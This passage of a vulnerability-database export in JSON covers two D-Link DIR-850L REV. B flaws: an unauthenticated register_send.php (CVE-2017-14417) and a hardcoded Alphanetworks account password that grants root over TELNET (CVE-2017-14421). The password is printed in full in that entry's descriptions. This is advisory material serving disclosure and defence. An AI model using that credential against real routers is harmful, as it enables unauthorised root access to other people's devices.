        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "acInsufInfo": false,
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "NVD",
            "availabilityImpact": "PARTIAL",
            "baseScore": 7.5,
            "confidentialityImpact": "PARTIAL",
            "exploitabilityScore": 10.0,
            "impactScore": 6.4,
            "integrityImpact": "PARTIAL",
            "obtainAllPrivilege": false,
            "obtainOtherPrivilege": false,
            "obtainUserPrivilege": false,
            "severity": "HIGH",
            "trust": 1.0,
            "userInteractionRequired": false,
            "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
            "version": "2.0"
          },
          {
            "acInsufInfo": null,
            "accessComplexity": "Low",
            "accessVector": "Network",
            "authentication": "None",
            "author": "NVD",
            "availabilityImpact": "Partial",
            "baseScore": 7.5,
            "confidentialityImpact": "Partial",
            "exploitabilityScore": null,
            "id": "CVE-2017-14417",
            "impactScore": null,
            "integrityImpact": "Partial",
            "obtainAllPrivilege": null,
            "obtainOtherPrivilege": null,
            "obtainUserPrivilege": null,
            "severity": "High",
            "trust": 0.8,
            "userInteractionRequired": null,
            "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
            "version": "2.0"
          },
          {
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "CNVD",
            "availabilityImpact": "PARTIAL",
            "baseScore": 7.5,
            "confidentialityImpact": "PARTIAL",
            "exploitabilityScore": 10.0,
            "id": "CNVD-2017-31792",
            "impactScore": 6.4,
            "integrityImpact": "PARTIAL",
            "severity": "HIGH",
            "trust": 0.6,
            "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
            "version": "2.0"
          },
          {
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "VULHUB",
            "availabilityImpact": "PARTIAL",
            "baseScore": 7.5,
            "confidentialityImpact": "PARTIAL",
            "exploitabilityScore": 10.0,
            "id": "VHN-105137",
            "impactScore": 6.4,
            "integrityImpact": "PARTIAL",
            "severity": "HIGH",
            "trust": 0.1,
            "vectorString": "AV:N/AC:L/AU:N/C:P/I:P/A:P",
            "version": "2.0"
          }
        ],
        "cvssV3": [
          {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "author": "NVD",
            "availabilityImpact": "HIGH",
            "baseScore": 9.8,
            "baseSeverity": "CRITICAL",
            "confidentialityImpact": "HIGH",
            "exploitabilityScore": 3.9,
            "impactScore": 5.9,
            "integrityImpact": "HIGH",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "trust": 1.0,
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.1"
          },
          {
            "attackComplexity": "Low",
            "attackVector": "Network",
            "author": "NVD",
            "availabilityImpact": "High",
            "baseScore": 9.8,
            "baseSeverity": "Critical",
            "confidentialityImpact": "High",
            "exploitabilityScore": null,
            "id": "CVE-2017-14417",
            "impactScore": null,
            "integrityImpact": "High",
            "privilegesRequired": "None",
            "scope": "Unchanged",
            "trust": 0.8,
            "userInteraction": "None",
            "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.0"
          }
        ],
        "severity": [
          {
            "author": "NVD",
            "id": "CVE-2017-14417",
            "trust": 1.8,
            "value": "CRITICAL"
          },
          {
            "author": "CNVD",
            "id": "CNVD-2017-31792",
            "trust": 0.6,
            "value": "HIGH"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-201709-578",
            "trust": 0.6,
            "value": "CRITICAL"
          },
          {
            "author": "VULHUB",
            "id": "VHN-105137",
            "trust": 0.1,
            "value": "HIGH"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-31792"
      },
      {
        "db": "VULHUB",
        "id": "VHN-105137"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-008098"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-14417"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201709-578"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "register_send.php on D-Link DIR-850L REV. B (with firmware through FW208WWb02) devices does not require authentication, which can result in unintended enrollment in mydlink Cloud Services. D-Link DIR-850L There is an access control vulnerability in the device firmware.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. D-LinkDIR-850LREV.B is a wireless router from D-Link. A security vulnerability exists in the register_send.php file in the D-LinkDIR-850LREV.B device using FW208WWb02 and previous firmware. The vulnerability stems from the program not requiring authentication. An attacker could exploit the vulnerability to gain access",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2017-14417"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-008098"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2017-31792"
      },
      {
        "db": "VULHUB",
        "id": "VHN-105137"
      }
    ],
    "trust": 2.25
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2017-14417",
        "trust": 3.1
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-008098",
        "trust": 0.8
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201709-578",
        "trust": 0.7
      },
      {
        "db": "CNVD",
        "id": "CNVD-2017-31792",
        "trust": 0.6
      },
      {
        "db": "VULHUB",
        "id": "VHN-105137",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-31792"
      },
      {
        "db": "VULHUB",
        "id": "VHN-105137"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-008098"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-14417"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201709-578"
      }
    ]
  },
  "id": "VAR-201709-0588",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-31792"
      },
      {
        "db": "VULHUB",
        "id": "VHN-105137"
      }
    ],
    "trust": 1.7
  },
  "iot_taxonomy": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "category": [
          "IoT",
          "Network device"
        ],
        "sub_category": null,
        "trust": 0.6
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-31792"
      }
    ]
  },
  "last_update_date": "2023-12-18T13:24:19.931000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "DIR-850L",
        "trust": 0.8,
        "url": "http://support.dlink.com/productinfo.aspx?m=dir-850l"
      },
      {
        "title": "D-Link DIR-850L REV. B Security vulnerabilities",
        "trust": 0.6,
        "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=100054"
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-008098"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201709-578"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-306",
        "trust": 1.1
      },
      {
        "problemtype": "CWE-284",
        "trust": 0.9
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-105137"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-008098"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-14417"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 2.5,
        "url": "https://pierrekim.github.io/blog/2017-09-08-dlink-850l-mydlink-cloud-0days-vulnerabilities.html"
      },
      {
        "trust": 1.4,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2017-14417"
      },
      {
        "trust": 0.8,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2017-14417"
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-31792"
      },
      {
        "db": "VULHUB",
        "id": "VHN-105137"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-008098"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-14417"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201709-578"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-31792"
      },
      {
        "db": "VULHUB",
        "id": "VHN-105137"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-008098"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-14417"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201709-578"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2017-10-27T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2017-31792"
      },
      {
        "date": "2017-09-13T00:00:00",
        "db": "VULHUB",
        "id": "VHN-105137"
      },
      {
        "date": "2017-10-10T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2017-008098"
      },
      {
        "date": "2017-09-13T17:29:00.370000",
        "db": "NVD",
        "id": "CVE-2017-14417"
      },
      {
        "date": "2017-09-18T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201709-578"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2017-10-30T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2017-31792"
      },
      {
        "date": "2019-10-03T00:00:00",
        "db": "VULHUB",
        "id": "VHN-105137"
      },
      {
        "date": "2017-10-10T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2017-008098"
      },
      {
        "date": "2023-11-08T20:57:21.283000",
        "db": "NVD",
        "id": "CVE-2017-14417"
      },
      {
        "date": "2019-10-23T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201709-578"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "remote",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201709-578"
      }
    ],
    "trust": 0.6
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "D-Link DIR-850L Vulnerability related to access control in device firmware",
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-008098"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "access control error",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201709-578"
      }
    ],
    "trust": 0.6
  }
}

VAR-201709-0592

Vulnerability from variot - Updated: 2023-12-18 13:19

D-Link DIR-850L REV. B (with firmware through FW208WWb02) devices have a hardcoded password of wrgac25_dlink.2013gui_dir850l for the Alphanetworks account upon device reset, which allows remote attackers to obtain root access via a TELNET session. The D-Link DIR-850L device firmware contains a vulnerability related to the use of hard-coded credentials. Information may be obtained or altered, and service operation may be disrupted (DoS). The D-Link DIR-850L REV. B is a wireless router from D-Link. A security vulnerability exists in the D-Link DIR-850L REV. B using FW208WWb02 and previous firmware. This vulnerability is due to the hard-coded password used by the Alphanetworks account. A remote attacker can exploit this vulnerability to gain root privileges with a TELNET session.


{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-201709-0592",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "dir-850l",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "fw208wwb02"
      },
      {
        "model": "dir-850l",
        "scope": "lte",
        "trust": 0.8,
        "vendor": "d link",
        "version": "fw208wwb02"
      },
      {
        "model": "dir-850l rev.b \u003c=fw208wwb02",
        "scope": null,
        "trust": 0.6,
        "vendor": "d link",
        "version": null
      },
      {
        "model": "dir-850l",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "d link",
        "version": "fw208wwb02"
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-31788"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-008133"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-14421"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201709-574"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dir-850l_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndIncluding": "fw208wwb02",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:dlink:dir-850l:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2017-14421"
      }
    ]
  },
  "cve": "CVE-2017-14421",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "acInsufInfo": false,
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "NVD",
            "availabilityImpact": "COMPLETE",
            "baseScore": 10.0,
            "confidentialityImpact": "COMPLETE",
            "exploitabilityScore": 10.0,
            "impactScore": 10.0,
            "integrityImpact": "COMPLETE",
            "obtainAllPrivilege": false,
            "obtainOtherPrivilege": false,
            "obtainUserPrivilege": false,
            "severity": "HIGH",
            "trust": 1.0,
            "userInteractionRequired": false,
            "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
            "version": "2.0"
          },
          {
            "acInsufInfo": null,
            "accessComplexity": "Low",
            "accessVector": "Network",
            "authentication": "None",
            "author": "NVD",
            "availabilityImpact": "Complete",
            "baseScore": 10.0,
            "confidentialityImpact": "Complete",
            "exploitabilityScore": null,
            "id": "CVE-2017-14421",
            "impactScore": null,
            "integrityImpact": "Complete",
            "obtainAllPrivilege": null,
            "obtainOtherPrivilege": null,
            "obtainUserPrivilege": null,
            "severity": "High",
            "trust": 0.9,
            "userInteractionRequired": null,
            "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
            "version": "2.0"
          },
          {
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "CNVD",
            "availabilityImpact": "COMPLETE",
            "baseScore": 10.0,
            "confidentialityImpact": "COMPLETE",
            "exploitabilityScore": 10.0,
            "id": "CNVD-2017-31788",
            "impactScore": 10.0,
            "integrityImpact": "COMPLETE",
            "severity": "HIGH",
            "trust": 0.6,
            "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
            "version": "2.0"
          },
          {
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "VULHUB",
            "availabilityImpact": "COMPLETE",
            "baseScore": 10.0,
            "confidentialityImpact": "COMPLETE",
            "exploitabilityScore": 10.0,
            "id": "VHN-105142",
            "impactScore": 10.0,
            "integrityImpact": "COMPLETE",
            "severity": "HIGH",
            "trust": 0.1,
            "vectorString": "AV:N/AC:L/AU:N/C:C/I:C/A:C",
            "version": "2.0"
          }
        ],
        "cvssV3": [
          {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "author": "NVD",
            "availabilityImpact": "HIGH",
            "baseScore": 9.8,
            "baseSeverity": "CRITICAL",
            "confidentialityImpact": "HIGH",
            "exploitabilityScore": 3.9,
            "impactScore": 5.9,
            "integrityImpact": "HIGH",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "trust": 1.0,
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.1"
          },
          {
            "attackComplexity": "Low",
            "attackVector": "Network",
            "author": "NVD",
            "availabilityImpact": "High",
            "baseScore": 9.8,
            "baseSeverity": "Critical",
            "confidentialityImpact": "High",
            "exploitabilityScore": null,
            "id": "CVE-2017-14421",
            "impactScore": null,
            "integrityImpact": "High",
            "privilegesRequired": "None",
            "scope": "Unchanged",
            "trust": 0.8,
            "userInteraction": "None",
            "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.0"
          }
        ],
        "severity": [
          {
            "author": "NVD",
            "id": "CVE-2017-14421",
            "trust": 1.8,
            "value": "CRITICAL"
          },
          {
            "author": "CNVD",
            "id": "CNVD-2017-31788",
            "trust": 0.6,
            "value": "HIGH"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-201709-574",
            "trust": 0.6,
            "value": "CRITICAL"
          },
          {
            "author": "VULHUB",
            "id": "VHN-105142",
            "trust": 0.1,
            "value": "HIGH"
          },
          {
            "author": "VULMON",
            "id": "CVE-2017-14421",
            "trust": 0.1,
            "value": "HIGH"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-31788"
      },
      {
        "db": "VULHUB",
        "id": "VHN-105142"
      },
      {
        "db": "VULMON",
        "id": "CVE-2017-14421"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-008133"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-14421"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201709-574"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "D-Link DIR-850L REV. B (with firmware through FW208WWb02) devices have a hardcoded password of wrgac25_dlink.2013gui_dir850l for the Alphanetworks account upon device reset, which allows remote attackers to obtain root access via a TELNET session. D-Link DIR-850L Device firmware contains a vulnerability related to the use of hard-coded credentials.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. D-LinkDIR-850LREV.B is a wireless router from D-Link. A security vulnerability exists in D-LinkDIR-850LREV.B using FW208WWb02 and previous firmware. This vulnerability is due to the hard-coded password used by the Alphanetworks account. A remote attacker can exploit this vulnerability to gain root privileges with a TELNET session",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2017-14421"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-008133"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2017-31788"
      },
      {
        "db": "VULHUB",
        "id": "VHN-105142"
      },
      {
        "db": "VULMON",
        "id": "CVE-2017-14421"
      }
    ],
    "trust": 2.34
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2017-14421",
        "trust": 3.2
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-008133",
        "trust": 0.8
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201709-574",
        "trust": 0.7
      },
      {
        "db": "CNVD",
        "id": "CNVD-2017-31788",
        "trust": 0.6
      },
      {
        "db": "VULHUB",
        "id": "VHN-105142",
        "trust": 0.1
      },
      {
        "db": "VULMON",
        "id": "CVE-2017-14421",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-31788"
      },
      {
        "db": "VULHUB",
        "id": "VHN-105142"
      },
      {
        "db": "VULMON",
        "id": "CVE-2017-14421"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-008133"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-14421"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201709-574"
      }
    ]
  },
  "id": "VAR-201709-0592",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-31788"
      },
      {
        "db": "VULHUB",
        "id": "VHN-105142"
      }
    ],
    "trust": 1.7
  },
  "iot_taxonomy": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "category": [
          "IoT",
          "Network device"
        ],
        "sub_category": null,
        "trust": 0.6
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-31788"
      }
    ]
  },
  "last_update_date": "2023-12-18T13:19:21.312000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "DIR-850L",
        "trust": 0.8,
        "url": "http://support.dlink.com/productinfo.aspx?m=dir-850l"
      },
      {
        "title": "D-Link DIR-850L REV.B Security vulnerabilities",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=235001"
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-008133"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201709-574"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-798",
        "trust": 1.9
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-105142"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-008133"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-14421"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 2.6,
        "url": "https://pierrekim.github.io/blog/2017-09-08-dlink-850l-mydlink-cloud-0days-vulnerabilities.html"
      },
      {
        "trust": 1.4,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2017-14421"
      },
      {
        "trust": 0.8,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2017-14421"
      },
      {
        "trust": 0.1,
        "url": "https://cwe.mitre.org/data/definitions/798.html"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov"
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-31788"
      },
      {
        "db": "VULHUB",
        "id": "VHN-105142"
      },
      {
        "db": "VULMON",
        "id": "CVE-2017-14421"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-008133"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-14421"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201709-574"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-31788"
      },
      {
        "db": "VULHUB",
        "id": "VHN-105142"
      },
      {
        "db": "VULMON",
        "id": "CVE-2017-14421"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-008133"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-14421"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201709-574"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2017-10-27T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2017-31788"
      },
      {
        "date": "2017-09-13T00:00:00",
        "db": "VULHUB",
        "id": "VHN-105142"
      },
      {
        "date": "2017-09-13T00:00:00",
        "db": "VULMON",
        "id": "CVE-2017-14421"
      },
      {
        "date": "2017-10-10T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2017-008133"
      },
      {
        "date": "2017-09-13T17:29:00.527000",
        "db": "NVD",
        "id": "CVE-2017-14421"
      },
      {
        "date": "2017-09-19T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201709-574"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2017-10-27T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2017-31788"
      },
      {
